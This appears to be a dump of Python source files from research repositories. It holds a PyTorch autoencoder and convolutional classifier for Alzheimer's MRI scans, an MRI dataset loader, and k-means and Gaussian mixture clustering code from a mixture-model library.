self.decode = nn.ConvTranspose3d(n_filters, 1, 5)
def forward(self, x):
d = self.downsample(x)
h = F.relu(self.encode(d))
out = F.relu(self.decode(h))
return out, h, d
class AdaptativeConvolutionalNetwork(nn.Module):
"""
Classifier for binary classification task
"""
def __init__(self, n_filters, dropout=0, n_classes=2):
super(AdaptativeConvolutionalNetwork, self).__init__()
self.downsample = nn.MaxPool3d(2, 2)
self.encode = nn.Conv3d(1, n_filters, 5)
self.pool = nn.MaxPool3d(5, 5)
self.fc1 = nn.Linear(n_filters * 11 * 13 * 11, 800)
self.fc2 = nn.Linear(800, n_classes)
self.n_filters = n_filters
self.dropout = nn.Dropout(p=dropout)
def forward(self, x, train=False):
d = self.downsample(x)
h = F.relu(self.encode(d))
h = self.pool(h)
h = h.view(-1, self.n_filters * 11 * 13 * 11)
if train:
h = self.dropout(h)
h = F.relu(self.fc1(h))
out = self.fc2(h)
return out
def l1_penalty(var):
return torch.abs(var).sum()
def test_autoencoder(model, dataloader, criterion=nn.MSELoss(), gpu=False):
total_loss = 0
with torch.no_grad():
for sample in dataloader:
if gpu:
images, diagnoses = sample['image'].cuda(), sample['diagnosis'].cuda()
else:
images, diagnoses = sample['image'], sample['diagnosis']
outputs, hidden_layer, downsample = model(images)
loss = criterion(outputs, downsample)
total_loss += loss
print('Loss of the model: ' + str(total_loss))
return total_loss
def save_results(best_params, validloader, test_method, results_path, name, denomination='Accuracy', testloader=None,
gpu=False):
if testloader is not None:
len_test = len(testloader)
acc_test = test_method(best_params['best_model'], testloader, gpu=gpu)
else:
len_test = 0
acc_test = 0
acc_train = test_method(best_params['best_model'], trainloader, gpu=gpu)
output_name = 'best_' + name + '.txt'
text_file = open(path.join(results_path, output_name), 'w')
text_file.write('Best fold: %i \n' % best_params['fold'])
text_file.write('Best epoch: %i \n' % (best_params['best_epoch'] + 1))
text_file.write('Time of training: %d s \n' % best_params['training_time'])
if denomination == 'Accuracy':
text_file.write(denomination + ' on validation set: %.2f %% \n' % acc_train)
if testloader is not None:
text_file.write(denomination + ' on test set: %.2f %% \n' % acc_test)
text_file.close()
else:
text_file.write(denomination + ' on validation set: %.3E \n' % (acc_train / len(trainset)))
if testloader is not None:
text_file.write(denomination + ' on test set: %.3E \n' % (acc_test / len(testset)))
text_file.close()
if denomination == 'Accuracy':
print(denomination + ' of the network on the %i validation images: %.2f %%' % (len(trainset), acc_train))
print(denomination + ' of the network on the %i test images: %.2f %%' % (len_test, acc_test))
else:
print(denomination + ' of the network on the %i validation images: %.3E' % (len(trainset), acc_train))
print(denomination + ' of the network on the %i test images: %.3E' % (len_test, acc_test))
parameters_name = 'best_parameters_' + name + '.tar'
torch.save(best_params['best_model'].state_dict(), path.join(results_path, parameters_name))
def load_state_dict(self, state_dict):
"""
Loads a pretrained layer in a Module instance
:param self: the Module instance
:param state_dict: The dictionary of pretrained parameters
"""
own_state = self.state_dict()
for name, param in state_dict.items():
if name in own_state:
# backwards compatibility for serialized parameters
param = param.data
own_state[name].copy_(param)
if __name__ == '__main__':
from data_loader import MriBrainDataset, ToTensor, GaussianSmoothing
from training_functions import CrossValidationSplit, cross_validation, test
import torch.optim as optim
from torch.utils.data import DataLoader
from time import time
import argparse
import torchvision
parser = argparse.ArgumentParser()
# Mandatory arguments
parser.add_argument("train_path", type=str,
help='path to your list of subjects for training')
parser.add_argument("results_path", type=str,
help="where the outputs are stored")
parser.add_argument("caps_path", type=str,
help="path to your caps folder")
# Network structure
parser.add_argument('-filters', '--n_filters', type=int, default=150,
help='number of filters used in the encoding convolutional layer')
parser.add_argument('--n_classes', type=int, default=2,
help='Number of classes in the dataset')
# Dataset management
parser.add_argument('--bids', action='store_true', default=False)
parser.add_argument('--sigma', type=float, default=0,
help='Size of the Gaussian smoothing kernel (preprocessing)')
# Training arguments
parser.add_argument("-e", "--epochs", type=int, default=2,
help="number of loops on the whole dataset")
parser.add_argument('-lra', '--learning_rate_auto', type=float, default=1,
help='the learning rate of the optimizer of the sparse autoencoder ( * 0.0005)')
parser.add_argument('-lrc', '--learning_rate_class', type=float, default=1,
help='the learning rate of the optimizer of the classifier ( * 0.0005)')
parser.add_argument("-l1", "--lambda1", type=float, default=1,
help="coefficient of the L1 regularization for the sparsity of the autoencoder")
parser.add_argument('-cv', '--cross_validation', type=int, default=10,
help='cross validation parameter')
parser.add_argument('--dropout', '-d', type=float, default=0.5,
help='Dropout rate before FC layers')
parser.add_argument('--batch_size', '-batch', type=int, default=4,
help="The size of the batches to train the network")
# Managing output
parser.add_argument("-n", "--name", type=str, default='network',
help="name given to the outputs and checkpoints of the parameters")
parser.add_argument("-save", "--save_interval", type=int, default=1,
help="the number of epochs done between the tests and saving")
# Managing device
parser.add_argument('--gpu', action='store_true', default=False,
help='Uses gpu instead of cpu if cuda is available')
parser.add_argument('--on_cluster', action='store_true', default=False,
help='to work on the cluster of the ICM')
args = parser.parse_args()
results_path = path.join(args.results_path, args.name)
if not path.exists(results_path):
os.makedirs(results_path)
if args.gpu and torch.cuda.is_available():
device = torch.device('cuda')
else:
device = torch.device("cpu")
# Autoencoder training
autoencoder = AdaptativeAutoEncoder(args.n_filters).to(device=device)
lr_autoencoder = 0.00005 * args.learning_rate_auto
lr_classifier = 0.00005 * args.learning_rate_class
batch_size = args.batch_size
train_prop = 0.85
val_prop = 0.15
tol = 1e-2
composed = torchvision.transforms.Compose([GaussianSmoothing(sigma=args.sigma), ToTensor(gpu=args.gpu)])
optimizer = optim.Adam(autoencoder.parameters(), lr=lr_autoencoder)
dataset = MriBrainDataset(args.train_path, args.caps_path, transform=composed, on_cluster=args.on_cluster)
cross_val = CrossValidationSplit(dataset, cv=train_prop, stratified=True, shuffle_diagnosis=True, val_prop=val_prop)
trainset, validset, testset = cross_val(dataset)
trainloader = DataLoader(trainset, batch_size=batch_size, shuffle=True, num_workers=4)
validloader = DataLoader(validset, batch_size=batch_size, shuffle=False, num_workers=4)
testloader = DataLoader(testset, batch_size=batch_size, shuffle=False, num_workers=4)
epoch = 0
loss_train = np.inf
loss_valid_min = np.inf
best_model = None
best_epoch = 0
t0 = time()
name = 'autoencoder_' + args.name
filename = path.join(results_path, name + '.tsv')
criterion = nn.MSELoss()
results_df = pd.DataFrame(columns=['epoch', 'training_time', 'acc_train', 'acc_validation'])
with open(filename, 'w') as f:
results_df.to_csv(f, index=False, sep='\t')
flag = True
while flag:
prev_loss_train = loss_train
running_loss = 0.0
for i, data in enumerate(trainloader, 0):
if args.gpu:
inputs = data['image'].cuda()
else:
inputs = data['image']
outputs, hidden_layer, downsample = autoencoder(inputs)
MSEloss = criterion(outputs, downsample)
l1_regularization = args.lambda1 * l1_penalty(hidden_layer)
loss = MSEloss + l1_regularization
optimizer.zero_grad()
loss.backward()
optimizer.step()
running_loss += loss.item()
if i % 10 == 9: # print every 10 mini-batches
print('[%d, %d] loss: %f' %
(epoch + 1, i + 1, running_loss))
running_loss = 0.0
print('Finished Epoch: %d' % (epoch + 1))
if epoch % args.save_interval == args.save_interval - 1:
training_time = time() - t0
loss_train = test_autoencoder(autoencoder, trainloader, gpu=args.gpu)
loss_valid = test_autoencoder(autoencoder, validloader, gpu=args.gpu)
row = np.array([epoch + 1, training_time, loss_train, loss_valid]).reshape(1, -1)
row_df = pd.DataFrame(row, columns=['epoch', 'training_time', 'loss_train', 'loss_validation'])
with open(filename, 'a') as f:
row_df.to_csv(f, header=False, index=False, sep='\t')
if loss_valid < loss_valid_min:
loss_valid_min = copy(loss_valid)
best_epoch = copy(epoch)
best_model = deepcopy(autoencoder)
epoch += 1
print('Convergence criterion: ', torch.abs((prev_loss_train - loss_train)/loss_train))
flag = epoch < args.epochs and torch.abs(prev_loss_train - loss_train)/loss_train > tol
training_time = time() - t0
best_params = {'training_time': time() - t0,
'best_epoch': best_epoch,
'best_model': best_model,
'loss_valid_min': loss_valid_min,
'fold': -1}
save_results(best_params, validloader, test_autoencoder, results_path, name, testloader=testloader,
denomination='Loss', gpu=args.gpu)
classifier = AdaptativeConvolutionalNetwork(args.n_filters, args.dropout,
n_classes=args.n_classes).to(device=device)
# Load pretrained layer in classifier
load_state_dict(classifier, best_model.state_dict())
classifier.encode.bias.requires_grad = False
classifier.encode.weight.requires_grad = False
name = 'classifier_' + args.name
best_params = cross_validation(classifier, trainset, batch_size=batch_size, folds=args.cross_validation,
epochs=args.epochs, results_path=results_path, model_name=name,
save_interval=args.save_interval, gpu=args.gpu, lr=lr_classifier,
tol=1.0)
```
#### File: deep_learning_ADNI/main/data_loader.py
```python
from torch.utils.data import Dataset
import torch
import pandas as pd
from os import path
from copy import copy
import nibabel as nib
import numpy as np
from nilearn import plotting
from skimage.transform import resize
from scipy.ndimage.filters import gaussian_filter
bids_cohort_dict = {'ADNI': 'ADNI_BIDS_T1_PET',
'AIBL': 'AIBL_BIDS',
'OASIS': 'OASIS_BIDS_new'}
minimum_size = np.array([145, 230, 200])
maximum_size = np.array([235, 280, 280])
def crop(image):
size = np.array(np.shape(image))
crop_idx = np.rint((size - minimum_size) / 2).astype(int)
first_crop = copy(crop_idx)
second_crop = copy(crop_idx)
for i in range(3):
if minimum_size[i] + first_crop[i] * 2 != size[i]:
first_crop[i] -= 1
cropped_image = image[first_crop[0]:size[0]-second_crop[0],
first_crop[1]:size[1]-second_crop[1],
first_crop[2]:size[2]-second_crop[2]]
return cropped_image
def pad(image):
size = np.array(np.shape(image))
pad_idx = np.rint((maximum_size - size) / 2).astype(int)
first_pad = copy(pad_idx)
second_pad = copy(pad_idx)
for i in range(3):
if size[i] + first_pad[i] * 2 != maximum_size[i]:
first_pad[i] -= 1
padded_image = np.pad(image, np.array([first_pad, second_pad]).T, mode='constant')
return padded_image
def transform_bids_image(reading_img, transform='crop'):
"""
Transformation of BIDS image: transposition of coordinates, flipping coordinages, rescaling voxel size,
rescaling global size
"""
header = reading_img.header
img = reading_img.get_data()
if len(np.shape(img)) == 4:
img = img[:, :, :, 0]
# Transposition
loc_x = np.argmax(np.abs(header['srow_x'][:-1:]))
loc_y = np.argmax(np.abs(header['srow_y'][:-1:]))
loc_z = np.argmax(np.abs(header['srow_z'][:-1:]))
transposed_image = img.transpose(loc_x, loc_y, loc_z)
# Directions
flips = [False, False, False]
flips[0] = (np.sign(header['srow_x'][loc_x]) == -1)
flips[1] = (np.sign(header['srow_y'][loc_y]) == -1)
flips[2] = (np.sign(header['srow_z'][loc_z]) == -1)
for coord, flip in enumerate(flips):
if flip:
transposed_image = np.flip(transposed_image, coord)
# Resizing voxels
coeff_x = np.max(np.abs(header['srow_x'][:-1:]))
coeff_y = np.max(np.abs(header['srow_y'][:-1:]))
coeff_z = np.max(np.abs(header['srow_z'][:-1:]))
transposed_size = np.shape(transposed_image)
transposed_image = transposed_image / np.max(transposed_image)
new_size = np.rint(np.array(transposed_size) * np.array([coeff_x, coeff_y, coeff_z]))
resized_image = resize(transposed_image, new_size, mode='constant')
# Adaptation before rescale
if transform == 'crop':
image = crop(resized_image)
elif transform == 'pad':
image = pad(resized_image)
else:
raise ValueError("The transformations allowed are cropping (transform='crop') or padding (transform='pad')")
# Final rescale
rescale_image = resize(image, (121, 145, 121), mode='constant')
return rescale_image
class BidsMriBrainDataset(Dataset):
"""Dataset of subjects of CLINICA (baseline only) from BIDS"""
def __init__(self, subjects_df_path, caps_dir, transform=None, classes=2, rescale='crop'):
"""
:param subjects_df_path: Path to a TSV file with the list of the subjects in the dataset
:param caps_dir: The BIDS directory where the images are stored
:param transform: Optional transform to be applied to a sample
:param classes: Number of classes to consider for classification
if 2 --> ['CN', 'AD']
if 3 --> ['CN', 'MCI', 'AD']
"""
if type(subjects_df_path) is str:
self.subjects_df = pd.read_csv(subjects_df_path, sep='\t')
elif type(subjects_df_path) is pd.DataFrame:
self.subjects_df = subjects_df_path
else:
raise ValueError('Please enter a path or a Dataframe as first argument')
self.caps_dir = caps_dir
self.transform = transform
if classes == 2:
self.diagnosis_code = {'CN': 0, 'AD': 1}
elif classes == 3:
self.diagnosis_code = {'CN': 0, 'MCI': 1, 'AD': 2}
elif classes == 4:
self.diagnosis_code = {'CN': 0, 'sMCI': 1, 'pMCI': 2, 'AD': 3}
self.extension = '_ses-M00_T1w.nii.gz'
self.folder_path = path.join('ses-M00', 'anat')
self.rescale = rescale
def __len__(self):
return len(self.subjects_df)
def __getitem__(self, subj_idx):
subj_name = self.subjects_df.loc[subj_idx, 'participant_id']
diagnosis = self.subjects_df.loc[subj_idx, 'diagnosis']
cohort = self.subjects_df.loc[subj_idx, 'cohort']
img_name = subj_name + self.extension
data_path = path.join(self.caps_dir, bids_cohort_dict[cohort])
img_path = path.join(data_path, subj_name, self.folder_path, img_name)
reading_image = nib.load(img_path)
image = transform_bids_image(reading_image, self.rescale)
# Convert diagnosis to int
if type(diagnosis) is str:
diagnosis = self.diagnosis_code[diagnosis]
sample = {'image': image, 'diagnosis': diagnosis, 'name': subj_name}
if self.transform:
sample = self.transform(sample)
return sample
def subjects_list(self):
return self.subjects_df['participant_id'].values.tolist()
def diagnosis_list(self):
diagnosis_list = self.subjects_df['diagnosis'].values.tolist()
diagnosis_code = [self.diagnosis_code[diagnosis] for diagnosis in diagnosis_list]
return diagnosis_code
def imsave(self, subj_idx, output_path, cut_coords=None, use_transforms=True):
"""
Creates a png file with frontal, axial and lateral cuts of the brain.
:param subj_idx: The index of the subject in the dataset
:param output_path: The path to the created image
:param cut_coords: Coordinates to define the cuts (optional)
:return: None
"""
subj_name = self.subjects_df.loc[subj_idx, 'participant_id']
diagnosis = self.subjects_df.loc[subj_idx, 'diagnosis']
cohort = self.subjects_df.loc[subj_idx, 'cohort']
img_name = subj_name + self.extension
data_path = path.join(self.caps_dir, bids_cohort_dict[cohort])
img_path = path.join(data_path, subj_name, self.folder_path, img_name)
reading_image = nib.load(img_path)
image = transform_bids_image(reading_image, self.rescale)
sample = {'image': image, 'diagnosis': diagnosis, 'name': subj_name}
if use_transforms and self.transform is not None:
sample = self.transform(sample)
final_image = nib.Nifti1Image(sample['image'], affine=np.eye(4))
anat = plotting.plot_anat(final_image, title='subject ' + subj_name, cut_coords=cut_coords)
anat.savefig(output_path)
anat.close()
class MriBrainDataset(Dataset):
"""Dataset of subjects of CLINICA (baseline only) from CAPS"""
def __init__(self, subjects_df_path, caps_dir, transform=None, classes=2, preprocessing='dartel', on_cluster=False):
"""
:param subjects_df_path: Path to a TSV file with the list of the subjects in the dataset
:param caps_dir: The CAPS directory where the images are stored
:param transform: Optional transform to be applied to a sample
:param classes: Number of classes to consider for classification
if 2 --> ['CN', 'AD']
if 3 --> ['CN', 'MCI', 'AD']
:param processing:
"""
if type(subjects_df_path) is str:
self.subjects_df = pd.read_csv(subjects_df_path, sep='\t')
elif type(subjects_df_path) is pd.DataFrame:
self.subjects_df = subjects_df_path
else:
raise ValueError('Please enter a path or a Dataframe as first argument')
self.caps_dir = caps_dir
self.transform = transform
self.on_cluster = on_cluster
if classes == 2:
self.diagnosis_code = {'CN': 0, 'AD': 1}
elif classes == 3:
self.diagnosis_code = {'CN': 0, 'MCI': 1, 'AD': 2}
if preprocessing == 'mni':
self.extension = '_ses-M00_T1w_segm-graymatter_space-Ixi549Space_modulated-off_probability.nii.gz'
self.folder_path = path.join('ses-M00', 't1', 'spm', 'segmentation', 'normalized_space')
elif preprocessing == 'dartel':
self.extension = '_ses-M00_T1w_segm-graymatter_dartelinput.nii.gz'
self.folder_path = path.join('ses-M00', 't1', 'spm', 'segmentation', 'dartel_input')
else:
ValueError('The directory is a CAPS folder and the preprocessing value entered is not valid.'
'Valid values are ["dartel", "mni"]')
def __len__(self):
return len(self.subjects_df)
def __getitem__(self, subj_idx):
subj_name = self.subjects_df.loc[subj_idx, 'participant_id']
diagnosis = self.subjects_df.loc[subj_idx, 'diagnosis']
cohort = self.subjects_df.loc[subj_idx, 'cohort']
img_name = subj_name + self.extension
if self.on_cluster:
caps_name = 'CAPS_' + cohort + '_T1_SPM'
else:
caps_name = 'CAPS_' + cohort
data_path = path.join(self.caps_dir, caps_name, 'subjects')
img_path = path.join(data_path, subj_name, self.folder_path, img_name)
reading_image = nib.load(img_path)
image = reading_image.get_data()
# Convert diagnosis to int
if type(diagnosis) is str:
diagnosis = self.diagnosis_code[diagnosis]
sample = {'image': image, 'diagnosis': diagnosis, 'name': subj_name}
if self.transform:
sample = self.transform(sample)
return sample
def subjects_list(self):
return self.subjects_df['participant_id'].values.tolist()
def diagnosis_list(self):
diagnosis_list = self.subjects_df['diagnosis'].values.tolist()
diagnosis_code = [self.diagnosis_code[diagnosis] for diagnosis in diagnosis_list]
return diagnosis_code
def imsave(self, subj_idx, output_path, cut_coords=None, use_transforms=True):
"""
Creates a png file with frontal, axial and lateral cuts of the brain.
:param subj_idx: The index of the subject in the dataset
:param output_path: The path to the created image
:param cut_coords: Coordinates to define the cuts (optional)
:return: None
"""
subj_name = self.subjects_df.loc[subj_idx, 'participant_id']
diagnosis = self.subjects_df.loc[subj_idx, 'diagnosis']
cohort = self.subjects_df.loc[subj_idx, 'cohort']
img_name = subj_name + self.extension
if self.on_cluster:
caps_name = 'CAPS_' + cohort + '_T1_SPM'
else:
caps_name = 'CAPS_' + cohort
data_path = path.join(self.caps_dir, caps_name, 'subjects')
img_path = path.join(data_path, subj_name, self.folder_path, img_name)
reading_image = nib.load(img_path)
image = reading_image.get_data()
sample = {'image': image, 'diagnosis': diagnosis, 'name': subj_name}
if use_transforms and self.transform is not None:
sample = self.transform(sample)
final_image = nib.Nifti1Image(sample['image'], affine=np.eye(4))
anat = plotting.plot_anat(final_image, title='subject ' + subj_name, cut_coords=cut_coords)
anat.savefig(output_path)
anat.close()
class GaussianSmoothing(object):
def __init__(self, sigma):
self.sigma = sigma
def __call__(self, sample):
image = sample['image']
np.nan_to_num(image, copy=False)
smoothed_image = gaussian_filter(image, sigma=self.sigma)
sample['image'] = smoothed_image
return sample
class ToTensor(object):
"""Convert image type to Tensor and diagnosis to diagnosis code"""
def __init__(self, gpu=False):
self.gpu = gpu
def __call__(self, sample):
image, diagnosis, name = sample['image'], sample['diagnosis'], sample['name']
np.nan_to_num(image, copy=False)
if self.gpu:
return {'image': torch.from_numpy(image[np.newaxis, :]).float(),
'diagnosis': torch.from_numpy(np.array(diagnosis)),
'name': name}
else:
return {'image': torch.from_numpy(image[np.newaxis, :]).float(),
'diagnosis': diagnosis,
'name': name}
class MeanNormalization(object):
"""Normalize images using a .nii file with the mean values of all the subjets"""
def __init__(self, mean_path):
assert path.isfile(mean_path)
self.mean_path = mean_path
def __call__(self, sample):
reading_mean = nib.load(self.mean_path)
mean_img = reading_mean.get_data()
return {'image': sample['image'] - mean_img,
'diagnosis': sample['diagnosis'],
'name': sample['name']}
class LeftHippocampusSegmentation(object):
def __init__(self):
self.x_min = 68
self.x_max = 88
self.y_min = 60
self.y_max = 80
self.z_min = 28
self.z_max = 48
def __call__(self, sample):
image, diagnosis = sample['image'], sample['diagnosis']
hippocampus = image[self.x_min:self.x_max:, self.y_min:self.y_max:, self.z_min:self.z_max:]
return {'image': hippocampus,
'diagnosis': sample['diagnosis'],
'name': sample['name']}
if __name__ == '__main__':
import torchvision
subjects_tsv_path = '/Volumes/aramis-projects/elina.thibeausutre/data/2-classes/dataset-ADNI+AIBL+corrOASIS.tsv'
caps_path = '/Volumes/aramis-projects/CLINICA/CLINICA_datasets/BIDS'
sigma = 0
composed = torchvision.transforms.Compose([GaussianSmoothing(sigma),
# ToTensor()
])
dataset = BidsMriBrainDataset(subjects_tsv_path, caps_path, transform=composed)
# lengths = []
# for i in range(len(dataset)):
# image = dataset[i]['image']
# lengths.append(np.shape(image))
# if i % 100 == 99:
# print(i + 1, '/', len(dataset))
#
# lengths = np.unique(np.array(lengths), axis=0)
# print(lengths)
# length_df = pd.DataFrame(lengths)
# length_df.to_csv('/Users/elina.thibeausutre/Documents/data/lengths_BIDS.tsv', sep='\t')
idx = 0
dataset.imsave(idx, '/Users/elina.thibeausutre/Desktop/smooth' + str(sigma) + '+cropped+doubleresized+normalized_figure' + str(idx))
``` |
{
"source": "14thibea/Stage_ENS",
"score": 3
} |
#### File: megamix/batch/kmeans.py
```python
import numpy as np
import h5py
from .base import BaseMixture, _check_saving
def dist_matrix(points,means):
XX = np.einsum('ij,ij->i', points, points)[:, np.newaxis] # Size (n_points,1)
squared_matrix = np.dot(points,means.T) # Size (n_points,n_components)
YY = np.einsum('ij,ij->i', means, means)[np.newaxis, :] # Size (1,n_components)
squared_matrix *= -2
squared_matrix += XX
squared_matrix += YY
np.maximum(squared_matrix, 0, out=squared_matrix)
return np.sqrt(squared_matrix, out=squared_matrix)
class Kmeans(BaseMixture):
"""
Kmeans model.
Parameters
----------
n_components : int, defaults to 1.
Number of clusters used.
init : str, defaults to 'kmeans'.
Method used in order to perform the initialization,
must be in ['random', 'plus', 'AF_KMC'].
Attributes
----------
name : str
The name of the method : 'Kmeans'
means : array of floats (n_components,dim)
Contains the computed means of the model.
log_weights : array of floats (n_components,)
Contains the logarithm of the mixing coefficient of each cluster.
iter : int
The number of iterations computed with the method fit()
_is_initialized : bool
Ensures that the model has been initialized before using other
methods such as distortion() or predict_assignements().
Raises
------
ValueError : if the parameters are inconsistent, for example if the cluster number is negative, init_type is not in ['resp','mcw']...
References
----------
'Fast and Provably Good Seedings for k-Means', <NAME>, <NAME>, <NAME>, A.Krause
'Lloyd's algorithm <https://en.wikipedia.org/wiki/Lloyd's_algorithm>'_
'The remarkable k-means++ <https://normaldeviate.wordpress.com/2012/09/30/the-remarkable-k-means/>'_
"""
def __init__(self,n_components=1,init="plus",n_jobs=1):
super(Kmeans, self).__init__()
self.name = 'Kmeans'
self.n_components = n_components
self.init = init
self.n_jobs = n_jobs
self._is_initialized = False
self.iter = 0
self._check_parameters()
def _check_parameters(self):
if self.n_components < 1:
raise ValueError("The number of components cannot be less than 1")
else:
self.n_components = int(self.n_components)
if self.init not in ['random', 'plus', 'kmeans', 'AF_KMC']:
raise ValueError("Invalid value for 'init': %s "
"'init' should be in "
"['random', 'plus', 'kmeans', 'AF_KMC']"
% self.init)
def _initialize(self,points_data,points_test=None):
"""
This method initializes the Gaussian Mixture by setting the values of
the means, covariances and weights.
Parameters
----------
points_data : an array (n_points,dim)
Data on which the model is fitted.
points_test: an array (n_points,dim) | Optional
Data used to do early stopping (avoid overfitting)
"""
from .initializations import initialization_random
from .initializations import initialization_plus_plus
from .initializations import initialization_AF_KMC
n_points,dim = points_data.shape
#K-means++ initialization
if (self.init == "random"):
means = initialization_random(self.n_components,points_data)
self.means = means
self.log_weights = np.zeros(self.n_components) - np.log(self.n_components)
self.iter = 0
elif (self.init == "plus"):
means = initialization_plus_plus(self.n_components,points_data)
self.means = means
self.log_weights = np.zeros(self.n_components) - np.log(self.n_components)
self.iter = 0
elif (self.init == "AF_KMC"):
means = initialization_AF_KMC(self.n_components,points_data)
self.means = means
self.log_weights = np.zeros(self.n_components) - np.log(self.n_components)
self.iter = 0
elif (self.init == 'user'):
pass
else:
raise ValueError("Invalid value for 'initialization': %s "
"'initialization' should be in "
"['random', 'plus','AF_KMC']"
% self.init)
self._is_initialized = True
def _step_E(self,points):
"""
In this step the algorithm evaluates the responsibilities of each points in each cluster
Parameters
----------
points : an array (n_points,dim)
Returns
-------
resp: an array (n_points,n_components)
An array containing the hard assignements of each point.
If the point i belongs to the cluster j, the cell of the ith row
and the jth column contains 1, whereas the rest of the row is null.
"""
n_points,_ = points.shape
assignements = np.zeros((n_points,self.n_components))
M = dist_matrix(points,self.means)
for i in range(n_points):
index_min = np.argmin(M[i]) #the cluster number of the ith point is index_min
if (isinstance(index_min,np.int64)):
assignements[i][index_min] = 1
else: #Happens when two points are equally distant from a cluster mean
assignements[i][index_min[0]] = 1
return assignements
def _step_M(self,points,assignements):
"""
This method computes the new position of each means by minimizing the distortion
Parameters
----------
points : an array (n_points,dim)
assignements : an array (n_points,n_components)
an array containing the responsibilities of the clusters
"""
n_points,dim = points.shape
for i in range(self.n_components):
assignements_i = assignements[:,i:i+1]
n_set = np.sum(assignements_i)
idx_set,_ = np.where(assignements_i==1)
sets = points[idx_set]
if n_set > 0:
self.means[i] = np.asarray(np.sum(sets, axis=0)/n_set)
self.log_weights[i] = np.log(n_set + np.finfo(np.float64).eps)
def score(self,points,assignements=None):
"""
This method returns the distortion measurement at the end of the k_means.
Parameters
----------
points : an array (n_points,dim)
assignements : an array (n_components,dim)
an array containing the responsibilities of the clusters
Returns
-------
distortion : (float)
"""
if assignements is None:
assignements = self.predict_assignements(points)
if self._is_initialized:
n_points,_ = points.shape
distortion = 0
for i in range(self.n_components):
assignements_i = assignements[:,i:i+1]
n_set = np.sum(assignements_i)
idx_set,_ = np.where(assignements_i==1)
sets = points[idx_set]
if n_set != 0:
M = dist_matrix(sets,self.means[i].reshape(1,-1))
distortion += np.sum(M)
return distortion
else:
raise Exception("The model is not initialized")
def fit(self,points_data,points_test=None,n_iter_max=100,
n_iter_fix=None,tol=0,saving=None,file_name='model',
saving_iter=2):
"""The k-means algorithm
Parameters
----------
points_data : array (n_points,dim)
A 2D array of points on which the model will be trained
tol : float, defaults to 0
The EM algorithm will stop when the difference between two steps
regarding the distortion is less or equal to tol.
n_iter_max : int, defaults to 100
number of iterations maximum that can be done
saving_iter : int | defaults 2
An int to know how often the model is saved (see saving below).
file_name : str | defaults model
The name of the file (including the path).
Other Parameters
----------------
points_test : array (n_points_bis,dim) | Optional
A 2D array of points on which the model will be tested.
n_iter_fix : int | Optional
If not None, the algorithm will exactly do the number of iterations
of n_iter_fix and stop.
saving : str | Optional
A string in ['log','linear']. In the following equations x is the parameter
saving_iter (see above).
* If 'log', the model will be saved for all iterations which verify :
log(iter)/log(x) is an int
* If 'linear' the model will be saved for all iterations which verify :
iter/x is an int
Returns
-------
None
"""
n_points,_ = points_data.shape
#Initialization
if not self._is_initialized or self.init!='user':
self._initialize(points_data,points_test)
self.iter = 0
if saving is not None:
f = h5py.File(file_name + '.h5', 'a')
grp = f.create_group('best' + str(self.iter))
self.write(grp)
f.close()
condition = _check_saving(saving,saving_iter)
early_stopping = points_test is not None
first_iter = True
resume_iter = True
dist_data, dist_test = 0,0
#K-means beginning
while resume_iter:
assignements_data = self._step_E(points_data)
dist_data_pre = dist_data
if early_stopping:
assignements_test = self._step_E(points_test)
dist_test_pre = dist_test
self._step_M(points_data,assignements_data)
dist_data = self.score(points_data,assignements_data)
if early_stopping:
dist_test = self.score(points_test,assignements_test)
self.iter+=1
# Computation of resume_iter
if n_iter_fix is not None:
resume_iter = self.iter < n_iter_fix
elif first_iter:
first_iter = False
elif self.iter > n_iter_max:
resume_iter = False
else:
if early_stopping:
criterion = (dist_test_pre - dist_test)/len(points_test)
else:
criterion = (dist_data_pre - dist_data)/n_points
resume_iter = (criterion > tol)
if not resume_iter and saving is not None:
f = h5py.File(file_name + '.h5', 'a')
grp = f.create_group('best' + str(self.iter))
self.write(grp)
f.close()
elif condition(self.iter):
f = h5py.File(file_name + '.h5', 'a')
grp = f.create_group('iter' + str(self.iter))
self.write(grp)
f.close()
def predict_assignements(self,points):
"""
This function return the hard assignements of points once the model is
fitted.
"""
if self._is_initialized:
assignements = self._step_E(points)
return assignements
else:
raise Exception("The model is not initialized")
def _get_parameters(self):
return (self.log_weights, self.means)
def _set_parameters(self, params,verbose=True):
self.log_weights, self.means = params
if self.n_components != len(self.means) and verbose:
print('The number of components changed')
self.n_components = len(self.means)
def _limiting_model(self,points):
n_points,dim = points.shape
log_resp = self.predict_log_resp(points)
_,n_components = log_resp.shape
exist = np.zeros(n_components)
for i in range(n_points):
for j in range(n_components):
if np.argmax(log_resp[i])==j:
exist[j] = 1
idx_existing = np.where(exist==1)
log_weights = self.log_weights[idx_existing]
means = self.means[idx_existing]
params = (log_weights, means)
return params
```
#### File: megamix/online/GMM.py
```python
from .base import BaseMixture
from .base import _log_normal_matrix
from .base import cholupdate
from megamix.batch.initializations import initialization_plus_plus, initialization_k_means
from .kmeans import dist_matrix
import numpy as np
from scipy.misc import logsumexp
import scipy
class GaussianMixture(BaseMixture):
"""
Gaussian Mixture Model
Representation of a Gaussian mixture model probability distribution.
This class allows to estimate the parameters of a Gaussian mixture
distribution (with full covariance matrices only).
Parameters
----------
n_components : int, defaults to 1
Number of clusters used.
kappa : double, defaults to 1.0
A coefficient in ]0.0,1.0] which give weight or not to the new points compared
to the ones already used.
* If kappa is nearly null, the new points have a big weight and the model may take a lot of time to stabilize.
* If kappa = 1.0, the new points won't have a lot of weight and the model may not move enough from its initialization.
window : int, defaults to 1
The number of points used at the same time in order to update the
parameters.
update : bool, defaults to False
If True, the matrices of Cholesky of covariance matrices are updated,
else they are computed at each iteration.
Set it to True if window < dimension of the problem.
reg_covar : float, defaults to 1e-6
In order to avoid null covariances this float is added to the diagonal
of covariance matrices.
Attributes
----------
name : str
The name of the method : 'GMM'
cov : array of floats (n_components,dim,dim)
Contains the computed covariance matrices of the mixture.
means : array of floats (n_components,dim)
Contains the computed means of the mixture.
log_weights : array of floats (n_components,)
Contains the logarithm of weights of each cluster.
iter : int
The number of iterations computed with the method fit()
Raises
------
ValueError : if the parameters are inconsistent, for example if the cluster number is negative, init_type is not in ['resp','mcw']...
References
----------
*Online but Accurate Inference for Latent Variable Models with Local Gibbs Sampling*, <NAME> & <NAME>
"""
def __init__(self, n_components=1,kappa=1.0,reg_covar=1e-6,
window=1,update=None):
super(GaussianMixture, self).__init__()
self.name = 'GMM'
self.n_components = n_components
self.covariance_type = 'full'
self.reg_covar = reg_covar
self.kappa = kappa
self.window = window
self.update = update
self.init = 'usual'
self._is_initialized = False
self.iter = 0
self._check_common_parameters()
self._check_parameters()
def _check_parameters(self):
if self.covariance_type not in ['full','spherical']:
